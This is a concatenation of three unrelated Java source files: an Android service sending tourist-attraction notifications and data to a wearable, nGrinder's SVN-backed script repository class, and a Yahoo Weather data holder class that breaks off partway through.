.setDeleteIntent(deletePendingIntent)
.setColor(getResources().getColor(R.color.colorPrimary))
.setCategory(Notification.CATEGORY_RECOMMENDATION)
.setAutoCancel(true);
if (!microApp) {
// If not a micro app, create some wearable pages for
// the other nearby tourist attractions.
ArrayList<Notification> pages = new ArrayList<Notification>();
for (int i = 1; i < count; i++) {
// Calculate the distance from current location to tourist attraction
String distance = Utils.formatDistanceBetween(
Utils.getLocation(this), attractions.get(i).location);
// Construct the notification and add it as a page
pages.add(new NotificationCompat.Builder(this)
.setContentTitle(attractions.get(i).name)
.setContentText(distance)
.setSmallIcon(R.drawable.ic_stat_maps_pin_drop)
.extend(new NotificationCompat.WearableExtender()
.setBackground(bitmaps.get(attractions.get(i).name))
)
.build());
}
builder.extend(new NotificationCompat.WearableExtender().addPages(pages));
}
// Trigger the notification
NotificationManagerCompat.from(this).notify(
Constants.MOBILE_NOTIFICATION_ID, builder.build());
}
/**
* Transfer the required data over to the wearable
* @param attractions list of attraction data to transfer over
*/
private void sendDataToWearable(List<Attraction> attractions) {
GoogleApiClient googleApiClient = new GoogleApiClient.Builder(this)
.addApi(Wearable.API)
.build();
// It's OK to use blockingConnect() here as we are running in an
// IntentService that executes work on a separate (background) thread.
ConnectionResult connectionResult = googleApiClient.blockingConnect(
Constants.GOOGLE_API_CLIENT_TIMEOUT_S, TimeUnit.SECONDS);
// Limit attractions to send
int count = attractions.size() > Constants.MAX_ATTRACTIONS ?
Constants.MAX_ATTRACTIONS : attractions.size();
ArrayList<DataMap> attractionsData = new ArrayList<>(count);
for (int i = 0; i < count; i++) {
Attraction attraction = attractions.get(i);
Bitmap image = null;
Bitmap secondaryImage = null;
try {
// Fetch and resize attraction image bitmap
image = Glide.with(this)
.load(attraction.imageUrl)
.asBitmap()
.diskCacheStrategy(DiskCacheStrategy.SOURCE)
.into(Constants.WEAR_IMAGE_SIZE_PARALLAX_WIDTH, Constants.WEAR_IMAGE_SIZE)
.get();
secondaryImage = Glide.with(this)
.load(attraction.secondaryImageUrl)
.asBitmap()
.diskCacheStrategy(DiskCacheStrategy.SOURCE)
.into(Constants.WEAR_IMAGE_SIZE_PARALLAX_WIDTH, Constants.WEAR_IMAGE_SIZE)
.get();
} catch (InterruptedException | ExecutionException e) {
Log.e(TAG, "Exception loading bitmap from network");
}
if (image != null && secondaryImage != null) {
DataMap attractionData = new DataMap();
String distance = Utils.formatDistanceBetween(
Utils.getLocation(this), attraction.location);
attractionData.putString(Constants.EXTRA_TITLE, attraction.name);
attractionData.putString(Constants.EXTRA_DESCRIPTION, attraction.description);
attractionData.putDouble(
Constants.EXTRA_LOCATION_LAT, attraction.location.latitude);
attractionData.putDouble(
Constants.EXTRA_LOCATION_LNG, attraction.location.longitude);
attractionData.putString(Constants.EXTRA_DISTANCE, distance);
attractionData.putString(Constants.EXTRA_CITY, attraction.city);
attractionData.putAsset(Constants.EXTRA_IMAGE,
Utils.createAssetFromBitmap(image));
attractionData.putAsset(Constants.EXTRA_IMAGE_SECONDARY,
Utils.createAssetFromBitmap(secondaryImage));
attractionsData.add(attractionData);
}
}
if (connectionResult.isSuccess() && googleApiClient.isConnected()
&& attractionsData.size() > 0) {
PutDataMapRequest dataMap = PutDataMapRequest.create(Constants.ATTRACTION_PATH);
dataMap.getDataMap().putDataMapArrayList(Constants.EXTRA_ATTRACTIONS, attractionsData);
dataMap.getDataMap().putLong(Constants.EXTRA_TIMESTAMP, new Date().getTime());
PutDataRequest request = dataMap.asPutDataRequest();
// Send the data over
DataApi.DataItemResult result =
Wearable.DataApi.putDataItem(googleApiClient, request).await();
if (!result.getStatus().isSuccess()) {
Log.e(TAG, String.format("Error sending data using DataApi (error code = %d)",
result.getStatus().getStatusCode()));
}
} else {
Log.e(TAG, String.format(Constants.GOOGLE_API_CLIENT_ERROR_MSG,
connectionResult.getErrorCode()));
}
googleApiClient.disconnect();
}
}
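/*
 * Receiving side (illustrative sketch, not part of this file): a wearable app would typically
 * consume the items written by sendDataToWearable() from a WearableListenerService. The names
 * below mirror the Play Services Wearable Data Layer API; the exact service wiring is assumed.
 *
 *   @Override
 *   public void onDataChanged(DataEventBuffer dataEvents) {
 *       for (DataEvent event : dataEvents) {
 *           if (event.getType() == DataEvent.TYPE_CHANGED
 *                   && Constants.ATTRACTION_PATH.equals(event.getDataItem().getUri().getPath())) {
 *               DataMap dataMap = DataMapItem.fromDataItem(event.getDataItem()).getDataMap();
 *               ArrayList<DataMap> attractions =
 *                       dataMap.getDataMapArrayList(Constants.EXTRA_ATTRACTIONS);
 *               // Each entry carries the title, description, distance and image assets
 *               // stored above under the Constants.EXTRA_* keys.
 *           }
 *       }
 *   }
 */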
|
|
/*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.ngrinder.script.repository;
import org.apache.commons.io.FilenameUtils;
import org.apache.commons.io.IOUtils;
import org.apache.commons.io.output.ByteArrayOutputStream;
import org.apache.commons.lang.StringUtils;
import org.ngrinder.common.exception.NGrinderRuntimeException;
import org.ngrinder.common.model.Home;
import org.ngrinder.common.util.EncodingUtils;
import org.ngrinder.infra.config.Config;
import org.ngrinder.model.User;
import org.ngrinder.script.model.FileCategory;
import org.ngrinder.script.model.FileEntry;
import org.ngrinder.script.model.FileType;
import org.ngrinder.user.repository.UserRepository;
import org.ngrinder.user.service.UserContext;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.context.annotation.Profile;
import org.springframework.stereotype.Component;
import org.tmatesoft.svn.core.*;
import org.tmatesoft.svn.core.auth.ISVNAuthenticationManager;
import org.tmatesoft.svn.core.internal.io.fs.FSRepositoryFactory;
import org.tmatesoft.svn.core.internal.wc.DefaultSVNOptions;
import org.tmatesoft.svn.core.io.ISVNEditor;
import org.tmatesoft.svn.core.io.SVNRepository;
import org.tmatesoft.svn.core.io.diff.SVNDeltaGenerator;
import org.tmatesoft.svn.core.wc.SVNClientManager;
import org.tmatesoft.svn.core.wc.SVNRevision;
import org.tmatesoft.svn.core.wc.SVNWCUtil;
import javax.annotation.PostConstruct;
import java.io.ByteArrayInputStream;
import java.io.File;
import java.io.FileOutputStream;
import java.io.InputStream;
import java.util.EmptyStackException;
import java.util.List;
import java.util.Map.Entry;
import static org.ngrinder.common.util.CollectionUtils.newArrayList;
import static org.ngrinder.common.util.ExceptionUtils.processException;
import static org.ngrinder.common.util.NoOp.noOp;
import static org.ngrinder.common.util.Preconditions.checkNotNull;
/**
 * SVN FileEntry repository.
 *
 * This class saves and retrieves {@link FileEntry} instances from local SVN folders.
*
* @author JunHo Yoon
* @since 3.0
*/
@Profile("production")
@Component
public class FileEntryRepository {
private static final Logger LOG = LoggerFactory.getLogger(FileEntryRepository.class);
@Autowired
private Config config;
private Home home;
private File subversionHome;
/**
 * Initialize the {@link FileEntryRepository}. This method is invoked after
 * construction to set up the FS repository factory.
*/
@PostConstruct
public void init() {
FSRepositoryFactory.setup();
home = config.getHome();
subversionHome = home.getSubFile("subversion");
}
@Autowired
private UserRepository userRepository;
/**
 * Get the user's repository directory.
 *
 * For unit tests, this method can be overridden.
*
* @param user the user
* @return user repository path.
*/
public File getUserRepoDirectory(User user) {
return home.getUserRepoDirectory(user.getUserId());
}
/**
* Return all {@link FileEntry}s under the given path.
*
* @param user user
* @param path path under which files are searched.
 * @param revision revision to look up. null (or -1) means HEAD.
* @return found {@link FileEntry}s
*/
public List<FileEntry> findAll(User user, final String path, Long revision) {
return findAll(user, path, revision, false);
}
/**
* Return all {@link FileEntry}s under the given path.
*
* @param user user
* @param path path under which files are searched.
 * @param revision revision to look up. null (or -1) means HEAD.
* @param recursive true if recursive finding
* @return found {@link FileEntry}s
*/
public List<FileEntry> findAll(User user, final String path, Long revision, boolean recursive) {
SVNRevision svnRevision = SVNRevision.HEAD;
if (revision != null && -1L != revision) {
svnRevision = SVNRevision.create(revision);
}
final List<FileEntry> fileEntries = newArrayList();
SVNClientManager svnClientManager = getSVNClientManager();
try {
svnClientManager.getLogClient().doList(SVNURL.fromFile(getUserRepoDirectory(user)).appendPath(path, true),
svnRevision, svnRevision, true, recursive, new ISVNDirEntryHandler() {
@Override
public void handleDirEntry(SVNDirEntry dirEntry) throws SVNException {
FileEntry script = new FileEntry();
// Exclude base path "/"
if (StringUtils.isBlank(dirEntry.getRelativePath())) {
return;
}
script.setPath(FilenameUtils.normalize(path + "/" + dirEntry.getRelativePath(), true));
script.setCreatedDate(dirEntry.getDate());
script.setLastModifiedDate(dirEntry.getDate());
script.setDescription(dirEntry.getCommitMessage());
script.setRevision(dirEntry.getRevision());
if (dirEntry.getKind() == SVNNodeKind.DIR) {
script.setFileType(FileType.DIR);
} else {
script.getFileType();
script.setFileSize(dirEntry.getSize());
}
fileEntries.add(script);
}
});
} catch (Exception e) {
LOG.debug("findAll() to the not existing folder {}", path);
} finally {
closeSVNClientManagerQuietly(svnClientManager);
}
return fileEntries;
}
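/*
 * Illustrative call patterns (sketch, assuming an injected repository instance and a valid user):
 *
 *   repository.findAll(user, "scripts", null);        // HEAD revision, non-recursive
 *   repository.findAll(user, "scripts", 120L, true);  // revision 120, recursive
 *   repository.findAll(user, "scripts", -1L, true);   // -1 also resolves to HEAD (see above)
 */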
/**
 * Return all {@link FileEntry}s which the user has. It excludes
* {@link FileType#DIR} entries.
*
* @param user user
* @return found {@link FileEntry}s
*/
public List<FileEntry> findAll(final User user) {
final List<FileEntry> scripts = newArrayList();
SVNClientManager svnClientManager = getSVNClientManager();
try {
svnClientManager.getLogClient().doList(SVNURL.fromFile(getUserRepoDirectory(user)), SVNRevision.HEAD,
SVNRevision.HEAD, false, true, new ISVNDirEntryHandler() {
@Override
public void handleDirEntry(SVNDirEntry dirEntry) throws SVNException {
FileEntry script = new FileEntry();
String relativePath = dirEntry.getRelativePath();
if (StringUtils.isBlank(relativePath)) {
return;
}
script.setCreatedDate(dirEntry.getDate());
script.setLastModifiedDate(dirEntry.getDate());
script.setPath(relativePath);
script.setDescription(dirEntry.getCommitMessage());
long revision = dirEntry.getRevision();
script.setRevision(revision);
script.setFileType(dirEntry.getKind() == SVNNodeKind.DIR ? FileType.DIR : null);
script.setFileSize(dirEntry.getSize());
scripts.add(script);
}
});
} catch (Exception e) {
LOG.error("Error while fetching files from SVN for {}", user.getUserId());
LOG.debug("Error details :", e);
throw new NGrinderRuntimeException(e);
} finally {
closeSVNClientManagerQuietly(svnClientManager);
}
return scripts;
}
/**
* Return a {@link FileEntry} for the given path and revision.
*
* @param user user
* @param path path in the svn repo
* @param revision revision of the file
* @return found {@link FileEntry}, null if not found
*/
public FileEntry findOne(User user, String path, SVNRevision revision) {
final FileEntry script = new FileEntry();
SVNClientManager svnClientManager = null;
ByteArrayOutputStream outputStream = null;
try {
svnClientManager = getSVNClientManager();
SVNURL userRepoUrl = SVNURL.fromFile(getUserRepoDirectory(user));
if (userRepoUrl == null) {
return null;
}
SVNRepository repo = svnClientManager.createRepository(userRepoUrl, true);
SVNNodeKind nodeKind = repo.checkPath(path, -1);
if (nodeKind == SVNNodeKind.NONE) {
return null;
}
outputStream = new ByteArrayOutputStream();
SVNProperties fileProperty = new SVNProperties();
// Get File.
repo.getFile(path, revision.getNumber(), fileProperty, outputStream);
SVNDirEntry lastRevisionedEntry = repo.info(path, -1);
long lastRevisionNumber = (lastRevisionedEntry == null) ? -1 : lastRevisionedEntry.getRevision();
String revisionStr = fileProperty.getStringValue(SVNProperty.REVISION);
long revisionNumber = Long.parseLong(revisionStr);
SVNDirEntry info = repo.info(path, revisionNumber);
byte[] byteArray = outputStream.toByteArray();
script.setPath(path);
for (String name : fileProperty.nameSet()) {
script.getProperties().put(name, fileProperty.getStringValue(name));
}
script.setFileType(FileType.getFileTypeByExtension(FilenameUtils.getExtension(script.getFileName())));
if (script.getFileType().isEditable()) {
String autoDetectedEncoding = EncodingUtils.detectEncoding(byteArray, "UTF-8");
script.setContent(new String(byteArray, autoDetectedEncoding));
script.setEncoding(autoDetectedEncoding);
script.setContentBytes(byteArray);
} else {
script.setContentBytes(byteArray);
}
script.setDescription(info.getCommitMessage());
script.setRevision(revisionNumber);
script.setLastRevision(lastRevisionNumber);
script.setCreatedUser(user);
} catch (Exception e) {
LOG.error("Error while fetching a file from SVN {}", user.getUserId() + "_" + path, e);
return null;
} finally {
closeSVNClientManagerQuietly(svnClientManager);
IOUtils.closeQuietly(outputStream);
}
return script;
}
private void addPropertyValue(ISVNEditor editor, FileEntry fileEntry) throws SVNException {
if (fileEntry.getFileType().getFileCategory() == FileCategory.SCRIPT) {
editor.changeFileProperty(fileEntry.getPath(), "targetHosts", SVNPropertyValue.create(""));
}
for (Entry<String, String> each : fileEntry.getProperties().entrySet()) {
editor.changeFileProperty(fileEntry.getPath(), each.getKey(), SVNPropertyValue.create(each.getValue()));
}
}
/**
 * Save the given fileEntry at the {@link FileEntry#getPath()} location.
*
* @param user the user
* @param fileEntry fileEntry to be saved
 * @param encoding file encoding with which fileEntry is saved. It is meaningful
 *                 only when the FileEntry is editable.
*/
public void save(User user, FileEntry fileEntry, String encoding) {
SVNClientManager svnClientManager = null;
ISVNEditor editor = null;
String checksum = null;
InputStream bais = null;
try {
svnClientManager = getSVNClientManager();
SVNRepository repo = svnClientManager.createRepository(SVNURL.fromFile(getUserRepoDirectory(user)), true);
SVNDirEntry dirEntry = repo.info(fileEntry.getPath(), -1);
// Add base paths
String fullPath = "";
// First check that no intermediate path element is an existing file
for (String each : getPathFragment(fileEntry.getPath())) {
fullPath = fullPath + "/" + each;
SVNDirEntry folderStepEntry = repo.info(fullPath, -1);
if (folderStepEntry != null && folderStepEntry.getKind() == SVNNodeKind.FILE) {
throw processException("User " + user.getUserId() + " tried to create folder "
+ fullPath + ". It's file..");
}
}
editor = repo.getCommitEditor(fileEntry.getDescription(), null, true, null);
editor.openRoot(-1);
fullPath = "";
for (String each : getPathFragment(fileEntry.getPath())) {
fullPath = fullPath + "/" + each;
try {
editor.addDir(fullPath, null, -1);
} catch (Exception e) {
// FALL THROUGH
noOp();
}
}
if (fileEntry.getFileType() == FileType.DIR) {
editor.addDir(fileEntry.getPath(), null, -1);
} else {
if (dirEntry == null) {
// If it's a new file
editor.addFile(fileEntry.getPath(), null, -1);
} else {
// If it's a modification
editor.openFile(fileEntry.getPath(), -1);
}
editor.applyTextDelta(fileEntry.getPath(), null);
// Calc diff
final SVNDeltaGenerator deltaGenerator = new SVNDeltaGenerator();
if (fileEntry.getContentBytes() == null && fileEntry.getFileType().isEditable()) {
bais = new ByteArrayInputStream(checkNotNull(fileEntry.getContent()).getBytes(
encoding == null ? "UTF-8" : encoding));
} else {
bais = new ByteArrayInputStream(fileEntry.getContentBytes());
}
checksum = deltaGenerator.sendDelta(fileEntry.getPath(), bais, editor, true);
}
addPropertyValue(editor, fileEntry);
editor.closeFile(fileEntry.getPath(), checksum);
} catch (Exception e) {
abortSVNEditorQuietly(editor);
// If we were adding a folder which already exists, ignore the error.
if (e instanceof SVNException && fileEntry.getFileType() == FileType.DIR) {
if (SVNErrorCode.FS_ALREADY_EXISTS.equals(((SVNException) e).getErrorMessage().getErrorCode())) {
return;
}
}
LOG.error("Error while saving file to SVN", e);
throw processException("Error while saving file to SVN", e);
} finally {
closeSVNEditorQuietly(editor);
closeSVNClientManagerQuietly(svnClientManager);
IOUtils.closeQuietly(bais);
}
}
String[] getPathFragment(String path) {
String basePath = FilenameUtils.getPath(path);
return StringUtils.split(FilenameUtils.separatorsToUnix(basePath), "/");
}
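/*
 * Example (sketch): getPathFragment("/scripts/perf/test.groovy") yields ["scripts", "perf"],
 * since FilenameUtils.getPath() drops the prefix and the file name before splitting on "/".
 */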
/**
 * Quietly abort the svn editor.
 *
 * @param editor editor to be aborted.
*/
private void abortSVNEditorQuietly(ISVNEditor editor) {
if (editor == null) {
return;
}
try {
editor.abortEdit();
} catch (SVNException e) {
// FALL THROUGH
noOp();
}
}
/**
 * Quietly close the svn editor. This is a convenience method.
*
* @param editor editor to be closed.
*/
private void closeSVNEditorQuietly(ISVNEditor editor) {
if (editor == null) {
return;
}
try {
// Close every directory still open on the editor's stack
//noinspection InfiniteLoopStatement
while (true) {
editor.closeDir();
}
} catch (EmptyStackException e) {
// FALL THROUGH
noOp();
} catch (SVNException e) {
// FALL THROUGH
noOp();
} finally {
try {
editor.closeEdit();
} catch (SVNException e) {
// FALL THROUGH
noOp();
}
}
}
/**
 * Delete the file entries at the given paths. If one of the paths does not exist,
 * the whole deletion is canceled.
*
* @param user user
* @param paths paths of file entries.
*/
public void delete(User user, List<String> paths) {
SVNClientManager svnClientManager = null;
ISVNEditor editor = null;
try {
svnClientManager = getSVNClientManager();
SVNRepository repo = svnClientManager.createRepository(SVNURL.fromFile(getUserRepoDirectory(user)), true);
editor = repo.getCommitEditor("delete", null, true, null);
editor.openRoot(-1);
for (String each : paths) {
editor.deleteEntry(each, -1);
}
} catch (Exception e) {
abortSVNEditorQuietly(editor);
LOG.error("Error while deleting file from SVN", e);
throw processException("Error while deleting files from SVN", e);
} finally {
closeSVNEditorQuietly(editor);
closeSVNClientManagerQuietly(svnClientManager);
}
}
@Autowired
UserContext userContext;
/**
* Get svn client manager with the designated subversionHome.
*
* @return svn client manager
*/
public SVNClientManager getSVNClientManager() {
DefaultSVNOptions options = SVNWCUtil.createDefaultOptions(subversionHome, true);
ISVNAuthenticationManager authManager = SVNWCUtil.createDefaultAuthenticationManager(subversionHome,
getCurrentUserId(), null, false);
return SVNClientManager.newInstance(options, authManager);
}
protected String getCurrentUserId() {
try {
return userContext.getCurrentUser().getUserId();
} catch (Exception e) {
return "default";
}
}
private void closeSVNClientManagerQuietly(SVNClientManager svnClientManager) {
if (svnClientManager != null) {
svnClientManager.dispose();
}
}
/**
* Check file existence.
*
* @param user user
* @param path path in user repo
* @return true if exists.
*/
public boolean hasOne(User user, String path) {
SVNClientManager svnClientManager = null;
try {
svnClientManager = getSVNClientManager();
SVNURL userRepoUrl = SVNURL.fromFile(getUserRepoDirectory(user));
SVNRepository repo = svnClientManager.createRepository(userRepoUrl, true);
SVNNodeKind nodeKind = repo.checkPath(path, -1);
return (nodeKind != SVNNodeKind.NONE);
} catch (Exception e) {
LOG.error("Error while fetching files from SVN", e);
throw processException("Error while checking file existence from SVN", e);
} finally {
closeSVNClientManagerQuietly(svnClientManager);
}
}
/**
 * Copy the content of the {@link FileEntry} at the given path into a local directory.
 *
 * This method only works for files, not directories.
 *
 * @param user user
 * @param path path of the {@link FileEntry}
 * @param toPathDir local directory into which the file is written.
*/
public void writeContentTo(User user, String path, File toPathDir) {
SVNClientManager svnClientManager = null;
FileOutputStream fileOutputStream = null;
try {
svnClientManager = getSVNClientManager();
SVNURL userRepoUrl = SVNURL.fromFile(getUserRepoDirectory(user));
SVNRepository repo = svnClientManager.createRepository(userRepoUrl, true);
SVNNodeKind nodeKind = repo.checkPath(path, -1);
// Missing paths and directories cannot be written out as a single file.
if (nodeKind == SVNNodeKind.NONE || nodeKind == SVNNodeKind.DIR) {
	throw processException("It is not possible to write a directory. nodeKind is " + nodeKind);
}
// Prepare the destination folder and file
//noinspection ResultOfMethodCallIgnored
toPathDir.mkdirs();
File destFile = new File(toPathDir, FilenameUtils.getName(path));
fileOutputStream = new FileOutputStream(destFile);
SVNProperties fileProperty = new SVNProperties();
// Get file.
repo.getFile(path, -1L, fileProperty, fileOutputStream);
} catch (Exception e) {
LOG.error("Error while fetching files from SVN", e);
throw processException("Error while fetching files from SVN", e);
} finally {
closeSVNClientManagerQuietly(svnClientManager);
IOUtils.closeQuietly(fileOutputStream);
}
}
}
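/*
 * Usage sketch (not part of the original nGrinder source): shows how a caller might commit,
 * list, check and delete a script through the repository above. The repository instance, the
 * user, the path and the content are assumed or made up purely for illustration.
 */
class FileEntryRepositoryUsageSketch {
	void saveListAndDelete(FileEntryRepository repository, User user) {
		// Build a new script entry and commit it to the user's SVN repository.
		FileEntry entry = new FileEntry();
		entry.setPath("scripts/sample.groovy");
		entry.setFileType(FileType.getFileTypeByExtension("groovy"));
		entry.setContent("println 'hello'");
		entry.setDescription("initial commit");
		repository.save(user, entry, "UTF-8");
		// List everything under the folder at HEAD, recursively.
		List<FileEntry> all = repository.findAll(user, "scripts", null, true);
		for (FileEntry each : all) {
			System.out.println(each.getPath());
		}
		// Remove the entry again if it exists.
		if (repository.hasOne(user, "scripts/sample.groovy")) {
			repository.delete(user, java.util.Collections.singletonList("scripts/sample.groovy"));
		}
	}
}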
|
|
/*
* Copyright (C) 2011 The Android Open Source Project
* Copyright (C) 2012 Zhenghong Wang
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.phildatoon.weather;
import java.util.ArrayList;
import java.util.List;
import android.annotation.SuppressLint;
import android.graphics.Bitmap;
/**
* A wrapper for all weather information provided by Yahoo! Weather APIs.
* @author Zhenghong Wang
*/
public class WeatherInfo {
String mTitle;
String mDescription;
String mLanguage;
String mLastBuildDate;
String mLocationCity;
String mLocationRegion; // region may be null
String mLocationCountry;
String mWindChill;
String mWindDirection;
String mWindSpeed;
String mAtmosphereHumidity;
String mAtmosphereVisibility;
String mAtmospherePressure;
String mAtmosphereRising;
String mAstronomySunrise;
String mAstronomySunset;
String mConditionTitle;
String mConditionLat;
String mConditionLon;
/*
* information in tag "yweather:condition"
*/
int mCurrentCode;
String mCurrentText;
int mCurrentTempC;
int mCurrentTempF;
String mCurrentConditionIconURL;
Bitmap mCurrentConditionIcon;
String mCurrentConditionDate;
/*
 * information in the seven "yweather:forecast" tags
 */
ForecastInfo mForecastInfo1 = new ForecastInfo();
ForecastInfo mForecastInfo2 = new ForecastInfo();
ForecastInfo mForecastInfo3 = new ForecastInfo();
ForecastInfo mForecastInfo4 = new ForecastInfo();
ForecastInfo mForecastInfo5 = new ForecastInfo();
ForecastInfo mForecastInfo6 = new ForecastInfo();
ForecastInfo mForecastInfo7 = new ForecastInfo();
private List<ForecastInfo> mForecastInfoList;
public WeatherInfo() {
mForecastInfoList = new ArrayList<WeatherInfo.ForecastInfo>();
mForecastInfoList.add(mForecastInfo1);
mForecastInfoList.add(mForecastInfo2);
mForecastInfoList.add(mForecastInfo3);
mForecastInfoList.add(mForecastInfo4);
mForecastInfoList.add(mForecastInfo5);
mForecastInfoList.add(mForecastInfo6);
mForecastInfoList.add(mForecastInfo7);
}
public List<ForecastInfo> getForecastInfoList() {
return mForecastInfoList;
}
protected void setForecastInfoList(List<ForecastInfo> forecastInfoList) {
mForecastInfoList = forecastInfoList;
}
public ForecastInfo getForecastInfo1() {
return mForecastInfo1;
}
protected void setForecastInfo1(ForecastInfo forecastInfo1) {
mForecastInfo1 = forecastInfo1;
}
public ForecastInfo getForecastInfo2() {
return mForecastInfo2;
}
protected void setForecastInfo2(ForecastInfo forecastInfo2) {
mForecastInfo2 = forecastInfo2;
}
public ForecastInfo getForecastInfo3() {
return mForecastInfo3;
}
protected void setForecastInfo3(ForecastInfo forecastInfo3) {
mForecastInfo3 = forecastInfo3;
}
public ForecastInfo getForecastInfo4() {
return mForecastInfo4;
}
protected void setForecastInfo4(ForecastInfo forecastInfo4) {
mForecastInfo4 = forecastInfo4;
}
public ForecastInfo getForecastInfo5() {
return mForecastInfo5;
}
protected void setForecastInfo5(ForecastInfo forecastInfo5) {
mForecastInfo5 = forecastInfo5;
}
public ForecastInfo getForecastInfo6() {
return mForecastInfo6;
}
protected void setForecastInfo6(ForecastInfo forecastInfo6) {
mForecastInfo6 = forecastInfo6;
}
public ForecastInfo getForecastInfo7() {
return mForecastInfo7;
}
protected void setForecastInfo7(ForecastInfo forecastInfo7) {
mForecastInfo7 = forecastInfo7;
}
public String getCurrentConditionDate() {
return mCurrentConditionDate;
}
protected void setCurrentConditionDate(String currentConditionDate) {
mCurrentConditionDate = currentConditionDate;
}
public int getCurrentCode() {
return mCurrentCode;
}
protected void setCurrentCode(int currentCode) {
mCurrentCode = currentCode;
// mCurrentConditionIconURL = "http://l.yimg.com/a/i/us/we/52/" + currentCode + ".gif";
mCurrentConditionIconURL = "http://l.yimg.com/a/i/us/nws/weather/gr/" + currentCode + "d.png";
}
public int getCurrentTempF() {
return mCurrentTempF;
}
protected void setCurrentTempF(int currentTempF) {
mCurrentTempF = currentTempF;
mCurrentTempC = this.turnFtoC(currentTempF);
}
public int getCurrentTempC() {
return mCurrentTempC;
}
public String getTitle() {
return mTitle;
}
protected void setTitle(String title) {
mTitle = title;
}
public String getDescription() {
return mDescription;
}
protected void setDescription(String description) {
mDescription = description;
}
public String getLanguage() {
return mLanguage;
}
protected void setLanguage(String language) {
mLanguage = language;
}
public String getLastBuildDate() {
return mLastBuildDate;
}
protected void setLastBuildDate(String lastBuildDate) {
mLastBuildDate = lastBuildDate;
}
public String getLocationCity() {
return mLocationCity;
}
protected void setLocationCity(String locationCity) {
mLocationCity = locationCity;
}
public String getLocationRegion() {
return mLocationRegion;
}
protected void setLocationRegion(String locationRegion) {
mLocationRegion = locationRegion;
}
public String getLocationCountry() {
return mLocationCountry;
}
protected void setLocationCountry(String locationCountry) {
mLocationCountry = locationCountry;
}
public String getWindChill() {
return mWindChill;
}
protected void setWindChill(String windChill) {
mWindChill = windChill;
}
public String getWindDirection() {
return mWindDirection;
}
protected void setWindDirection(String windDirection) {
mWindDirection = windDirection;
}
public String getWindSpeed() {
return mWindSpeed;
}
protected void setWindSpeed(String windSpeed) {
mWindSpeed = windSpeed;
}
public String getAtmosphereHumidity() {
return mAtmosphereHumidity;
}
protected void setAtmosphereHumidity(String atmosphereHumidity) {
mAtmosphereHumidity = atmosphereHumidity;
}
public String getAtmosphereVisibility() {
return mAtmosphereVisibility;
}
protected void setAtmosphereVisibility(String atmosphereVisibility) {
mAtmosphereVisibility = atmosphereVisibility;
}
public String getAtmospherePressure() {
return mAtmospherePressure;
}
protected void setAtmospherePressure(String atmospherePressure) {
mAtmospherePressure = atmospherePressure;
}
public String getAtmosphereRising() {
return mAtmosphereRising;
}
protected void setAtmosphereRising(String atmosphereRising) {
mAtmosphereRising = atmosphereRising;
}
public String getAstronomySunrise() {
return mAstronomySunrise;
}
protected void setAstronomySunrise(String astronomySunrise) {
mAstronomySunrise = astronomySunrise;
}
public String getAstronomySunset() {
return mAstronomySunset;
}
protected void setAstronomySunset(String astronomySunset) {
mAstronomySunset = astronomySunset;
}
public String getConditionTitle() {
return mConditionTitle;
}
protected void setConditionTitle(String conditionTitle) {
mConditionTitle = conditionTitle;
}
public String getConditionLat() {
return mConditionLat;
}
protected void setConditionLat(String conditionLat) {
mConditionLat = conditionLat;
}
public String getConditionLon() {
return mConditionLon;
}
protected void setConditionLon(String conditionLon) {
mConditionLon = conditionLon;
}
public String getCurrentText() {
return mCurrentText;
}
protected void setCurrentText(String currentText) {
mCurrentText = currentText;
}
protected void setCurrentTempC(int currentTempC) {
mCurrentTempC = currentTempC;
}
public String getCurrentConditionIconURL() {
return mCurrentConditionIconURL;
}
public Bitmap getCurrentConditionIcon() {
return mCurrentConditionIcon;
}
protected void setCurrentConditionIcon(Bitmap mCurrentConditionIcon) {
this.mCurrentConditionIcon = mCurrentConditionIcon;
}
private int turnFtoC(int tempF) {
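// Integer conversion (F - 32) * 5 / 9; fractional degrees are truncated by integer division.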
return (tempF - 32) * 5 / 9;
}
@SuppressLint("DefaultLocale")
public class ForecastInfo {
private String mForecastDay;
private String mForecastDate;
private int mForecastCode;
private int mForecastTempHighC;
private int mForecastTempLowC;
private int mForecastTempHighF;
private int mForecastTempLowF;
private String mForecastConditionIconURL;
private Bitmap mForecastConditionIcon;
private String mForecastText;
public Bitmap getForecastConditionIcon() {
return mForecastConditionIcon;
}
protected void setForecastConditionIcon(Bitmap mForecastConditionIcon) {
this.mForecastConditionIcon = mForecastConditionIcon;
}
public String getForecastDay() {
return mForecastDay;
}
protected void setForecastDay(String forecastDay) {
String[] shortDay = {"Mon", "Tue", "Wed", "Thu", "Fri", "Sat", "Sun"};
String[] longDay = {"Monday", "Tuesday", "Wednesday", "Thursday",
        "Friday", "Saturday", "Sunday"};
for (int x = 0; x < shortDay.length; x++) {
if (forecastDay.equals(shortDay[x])) {
forecastDay = longDay[x];
}
}
mForecastDay = forecastDay.toUpperCase();
}
public String getForecastDate() {
return mForecastDate;
}
protected void setForecastDate(String forecastDate) {
mForecastDate = forecastDate;
}
public int getForecastCode() {
return mForecastCode;
}
protected void setForecastCode(int forecastCode) {
mForecastCode = forecastCode;
//mForecastConditionIconURL = "http://l.yimg.com/a/i/us/we/52/" + forecastCode + ".gif";
mForecastConditionIconURL = "http://l.yimg.com/a/i/us/nws/weather/gr/" + forecastCode + "d.png";
}
public int getForecastTempHighC() {
return mForecastTempHighC;
}
protected void setForecastTempHighC(int forecastTempHighC) {
mForecastTempHighC = forecastTempHighC;
}
public int getForecastTempLowC() {
return mForecastTempLowC;
}
protected void setForecastTempLowC(int forecastTempLowC) {
mForecastTempLowC = forecastTempLowC;
}
public int getForecastTempHighF() {
return mForecastTempHighF;
}
protected void setForecastTempHighF(int forecastTempHighF) {
mForecastTempHighF = forecastTempHighF;
